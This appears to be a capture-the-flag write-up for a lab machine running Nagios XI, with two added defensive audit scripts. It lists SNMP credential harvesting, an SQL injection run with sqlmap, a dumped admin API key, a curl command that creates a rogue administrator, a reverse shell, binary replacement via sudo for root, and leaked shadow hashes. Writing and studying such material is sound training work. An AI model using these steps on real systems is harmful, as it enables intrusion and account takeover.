Basic information

Port scan

22,80,389,443:

$ nmap -sC -sV 10.10.11.248
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-15 13:14 CST
Nmap scan report for 10.10.11.248
Host is up (0.13s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA)
| 256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA)
|_ 256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519)
80/tcp open http Apache httpd 2.4.56
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Did not follow redirect to https://nagios.monitored.htb/
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.56 ((Debian))
|_ssl-date: TLS randomness does not represent time
|_http-title: Nagios XI
| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK
| Not valid before: 2023-11-11T21:46:55
|_Not valid after: 2297-08-25T21:46:55
|_http-server-header: Apache/2.4.56 (Debian)
| tls-alpn:
|_ http/1.1
Service Info: Host: nagios.monitored.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.70 seconds

This machine also needs a UDP scan, because of SNMP:

$ sudo nmap -sU --top-ports 100 10.10.11.248
Password:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-15 13:17 CST
Nmap scan report for nagios.monitored.htb (10.10.11.248)
Host is up (0.13s latency).
Not shown: 96 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
123/udp open ntp
161/udp open snmp
162/udp open|filtered snmptrap

Nmap done: 1 IP address (1 host up) scanned in 115.25 seconds

80

A hosts entry is needed:

10.10.11.248 nagios.monitored.htb

It is Nagios XI:

Credentials are required:

Directory scan

Directory scanning finds /nagios, which likewise requires credentials:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u https://nagios.monitored.htb/ -k

/nagios (Status: 401) [Size: 468]

SNMP

SNMP exposes credentials in a process command line:

snmpwalk -v 1 -c public 10.10.11.248
snmpwalk -v 1 -c public 10.10.11.248 HOST-RESOURCES-MIB::hrSWRunParameters

HOST-RESOURCES-MIB::hrSWRunParameters.579 = STRING: "-c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB "
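The line above is exactly what a read-only community string hands to anyone who can reach UDP/161: the full argv of every process, including a password passed as a script argument. The following Python script is an added example (not part of the writeup) that a defender can run over saved snmpwalk output to find such leaks before an attacker does. It parses HOST-RESOURCES-MIB::hrSWRunParameters lines and flags arguments that either follow an explicit credential flag or look like a bare high-entropy token; the sample input is constructed, with only the .579 line taken from the writeup, and the thresholds are heuristics, not a standard.

```python
import math
import re

# Constructed sample of `snmpwalk -v 1 -c public <host> HOST-RESOURCES-MIB::hrSWRunParameters`
# output. The .579 line is the one from the writeup; the other lines are made up for contrast.
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: ""
HOST-RESOURCES-MIB::hrSWRunParameters.412 = STRING: "-f /etc/ntpsec/ntp.conf"
HOST-RESOURCES-MIB::hrSWRunParameters.579 = STRING: "-c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB "
HOST-RESOURCES-MIB::hrSWRunParameters.801 = STRING: "--user=backup --password=Winter2024! /var/backups"
HOST-RESOURCES-MIB::hrSWRunParameters.902 = STRING: "-D -o ControlMaster=auto"
"""

# One hrSWRunParameters row: process index and the quoted argv string.
LINE_RE = re.compile(r'^HOST-RESOURCES-MIB::hrSWRunParameters\.(\d+) = STRING: "(.*)"\s*$')
# Explicit credential flags or key=value names in argv (assumed common spellings).
KEYWORD_RE = re.compile(r'(?i)(?:--?(?:pass(?:word)?|pwd|secret|token|api[-_]?key)[= ]|\bpassword=)')


def shannon_entropy(s):
    """Bits of entropy per character of s (0 for the empty string)."""
    if not s:
        return 0.0
    counts = {ch: s.count(ch) for ch in set(s)}
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_like_secret(arg):
    """Heuristic: a bare alphanumeric token of 12+ chars, mixed case, high entropy,
    that is not an option, a path or a key=value pair."""
    if len(arg) < 12 or arg.startswith(("-", "/")) or "=" in arg:
        return False
    if not re.fullmatch(r"[A-Za-z0-9]+", arg):
        return False
    mixed_case = any(c.islower() for c in arg) and any(c.isupper() for c in arg)
    return mixed_case and shannon_entropy(arg) > 3.5


def parse_walk(text):
    """Return {process_index: argv_string} for every hrSWRunParameters row in the walk."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            procs[int(m.group(1))] = m.group(2)
    return procs


def find_exposed_secrets(text):
    """Return [(process_index, argv, [reasons])] for processes whose argv likely carries a secret."""
    findings = []
    for pid, argv in parse_walk(text).items():
        reasons = []
        if KEYWORD_RE.search(argv):
            reasons.append("credential flag in argv")
        hits = [a for a in argv.split() if looks_like_secret(a)]
        if hits:
            reasons.append("high-entropy token(s): " + ", ".join(hits))
        if reasons:
            findings.append((pid, argv.strip(), reasons))
    return findings


if __name__ == "__main__":
    for pid, argv, reasons in find_exposed_secrets(SAMPLE_WALK):
        print(f"process {pid}: {'; '.join(reasons)}\n    {argv}")
```

The fix on the monitored side is not only a non-default community string: anything in argv is also visible to every local user through /proc, so the password should reach check_host.sh via an environment variable or a root-readable file rather than a positional argument.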

nagios

The credentials obtained from SNMP cannot log in to Nagios XI; it reports that the account is disabled or does not exist (in fact it is disabled).

But they do log in to Nagios Core, version 4.4.13.

nagiosxi

Searching turns up the API route:

This confirms the account is merely disabled; a token can still be obtained through the API:

curl -XPOST -k -L 'http://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=10'

"auth_token": "26f51ccc5e4fe3ee42c893ffb315915289020820",

SQL injection

Further searching reveals a series of vulnerabilities, among them an SQL injection:

Use the token from the previous step directly; if it fails, refresh the token:

sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=26f51ccc5e4fe3ee42c893ffb315915289020820"
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=26f51ccc5e4fe3ee42c893ffb315915289020820" --dbs
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=7bc597bc87680251cf5204c2b4066306e8096151" -D nagiosxi --tables
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=3bfeec8ba0dc27fb40cbfb24f4ca20bc68ebdcb9" -D nagiosxi -T xi_users --dump

The dumped database contains the API key:

admin@monitored.htb
IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL

admin

Then use the administrator's API key to add a new administrator:

curl -XPOST "http://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=miao&password=123456&name=miao&email=miao@miao.com&auth_level=admin"

After adding it, we can log in to Nagios XI as an administrator.

reverse shell

Once logged in, the other vulnerabilities can be used, for example the command injection:

Or, more conveniently, create a new command directly and then run that command from a service:

Configure -> core config manage -> commands

This gets a shell as nagios:

user flag

The nagios user's home directory; also drop in a public key to make later steps easier:

Privilege escalation information

The current user can run a few things with sudo:

The npcd init script does not exist:

nagios@monitored:~$ ls -al /etc/init.d/npcd
ls: cannot access '/etc/init.d/npcd': No such file or directory

Based on this:

We can start npcd through the sudo-permitted manage_services.sh; it launches its own copy of the binary, which we have write access to:

nagios@monitored:~$ ls -al /usr/local/nagios/bin/npcd
-rwxr-xr-x 1 nagios nagios 31584 Jan 14 09:50 /usr/local/nagios/bin/npcd
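The root cause here is a sudo rule that lets nagios restart services whose binaries nagios itself owns, so root ends up executing a file the low-privileged user can rewrite or rename. The following Python script is an added audit example (not part of the writeup or of Nagios) that checks every binary a service manager would launch against that property: it parses `ls -l` output like the line above and reports any entry that is a symlink, is not owned by a trusted user, or is writable by an untrusted group or by everyone. The inventory is constructed; only the npcd line comes from the writeup, and the trusted user/group defaults are an assumption.

```python
import re

# Constructed `ls -l` inventory of binaries that a sudo-permitted service script launches as root.
# The npcd line is the one from the writeup; the other lines are made up for contrast.
SAMPLE_LS = """\
-rwxr-xr-x 1 nagios nagios 31584 Jan 14 09:50 /usr/local/nagios/bin/npcd
-rwxr-xr-x 1 root   root   1402888 Oct  3  2023 /usr/local/nagios/bin/nagios
-rwxrwxr-x 1 root   nagios  30712 Jan 14 09:50 /usr/local/nagios/bin/nrpe
-rwxr-xrwx 1 root   root    12345 Jan 14 09:50 /usr/local/nagios/bin/ndo
lrwxrwxrwx 1 root   root        9 Jan 14 09:50 /usr/local/nagios/bin/npcdmod -> ../npcdmod.o
"""

# mode, link count, owner, group, size, month, day, time-or-year, path, optional symlink target
LS_RE = re.compile(
    r"^([-ldcbps][rwxsStT-]{9})[+.@]?\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+?)(?: -> (.+))?$"
)


def parse_ls(text):
    """Turn `ls -l` lines into dicts with mode, owner, group, path and symlink target."""
    entries = []
    for line in text.splitlines():
        m = LS_RE.match(line)
        if m:
            mode, owner, group, path, target = m.groups()
            entries.append({"mode": mode, "owner": owner, "group": group,
                            "path": path, "target": target})
    return entries


def weak_service_binary(entry, trusted_users=("root",), trusted_groups=("root",)):
    """Return the reasons a non-root user could change what root executes, empty if none.

    Mode string layout: index 0 is the type, 1-3 user bits, 4-6 group bits, 7-9 other bits."""
    mode = entry["mode"]
    if mode[0] == "l":
        # A symlink's own bits are always rwxrwxrwx; what matters is who controls the link and target.
        return ["symlink; target %s is what actually runs" % entry["target"]]
    reasons = []
    if entry["owner"] not in trusted_users:
        reasons.append("owned by %s, who can rewrite it" % entry["owner"])
    if mode[5] == "w" and entry["group"] not in trusted_groups:
        reasons.append("group %s can write it" % entry["group"])
    if mode[8] == "w":
        reasons.append("world-writable")
    return reasons


def audit(text):
    """Map each weak binary path to its findings; clean entries are left out."""
    report = {}
    for entry in parse_ls(text):
        reasons = weak_service_binary(entry)
        if reasons:
            report[entry["path"]] = reasons
    return report


if __name__ == "__main__":
    for path, reasons in audit(SAMPLE_LS).items():
        print(f"{path}: {'; '.join(reasons)}")
```

Ownership of the binary is only half of it: the directory it lives in must also be root-owned and not world-writable, otherwise the file can simply be renamed and replaced, which is exactly the trick used below when the running binary is reported busy. Run the same check on /usr/local/nagios/bin itself.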

Privilege escalation & root flag

So just replace npcd with your own and then run it:

# If npcd is running and the file is reported busy, simply rename the original
/usr/local/nagios/bin/npcd

sudo /usr/local/nagiosxi/scripts/manage_services.sh restart npcd

shadow

root:$y$j9T$LLy.W6CI0K6McgXMKio0i1$1omBVYjsg.8qEzyjkL.3kXtpAMZNc7x9CMwOnrwltJ8:19671:0:99999:7:::
svc:$y$j9T$JKvaJakBax4xU3.kZFe221$D2o.A3O6EXWgKPzpD8Gky7cPbXZ/a9Ey/9/OM1AoE80:19671:0:99999:7:::
nagios:$y$j9T$EnaS672RtIQB0i6zh.ooO/$gkWPA1PKoIQH.ACc6NVntLPY9x55i08J4S6c1Rpvqn.:19671:0:99999:7:::

References